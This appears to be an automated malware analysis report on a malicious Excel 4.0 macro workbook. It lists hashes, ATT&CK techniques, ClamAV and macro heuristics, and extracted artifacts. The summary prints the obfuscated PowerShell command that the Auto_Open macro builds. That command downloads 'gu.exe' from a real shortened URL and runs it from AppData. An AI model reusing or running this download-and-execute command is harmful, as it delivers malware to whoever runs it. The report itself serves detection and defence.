Office (OLE) / .XLS malware analysis — malicious · 8cf5713a4785d225

MALICIOUS

Office (OLE) / .XLS

43.5 KB Created: 2020-11-20 17:59:00 Authoring application: Microsoft Excel

MD5: f179a00727883b3b47704ce2b83cea3c SHA-1: 243ec9c3f0b3e0d6b20417c9371f4294ca266494 SHA-256: 8cf5713a4785d2251461dbca42247a31c82386a8b74ac39c235c005220ec5e58

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Service Execution: Service Control T1059.001 PowerShell T1204.002 Malicious File: User Execution T1105 Ingress Tool Transfer

The file contains Excel 4.0 macros that are triggered by the Auto_Open function. These macros construct and execute a PowerShell command. The PowerShell command downloads a file named 'gu.exe' from 'https://cutt.ly/shTXYO3' and then executes it. The constructed PowerShell command is 'powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata};.('.'+'/gu.exe')'. The XLM macro also contains a string that appears to be part of a PowerShell command to download a file using Net.WebClient.

Heuristics 4

ClamAV: Xls.Malware.Abracadabra-10031695-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Abracadabra-10031695-0
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_macros.txt` `38e5eff2d914f6ab1f9bc769844ad11e0598157db2e862e04c2806ecb7949839`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	1813 bytes
`macros.bas` `cd570610748f1d9f3b3da8aecc12295e1dff4beebd51624b3e1fafca26bf9c59`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1016 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.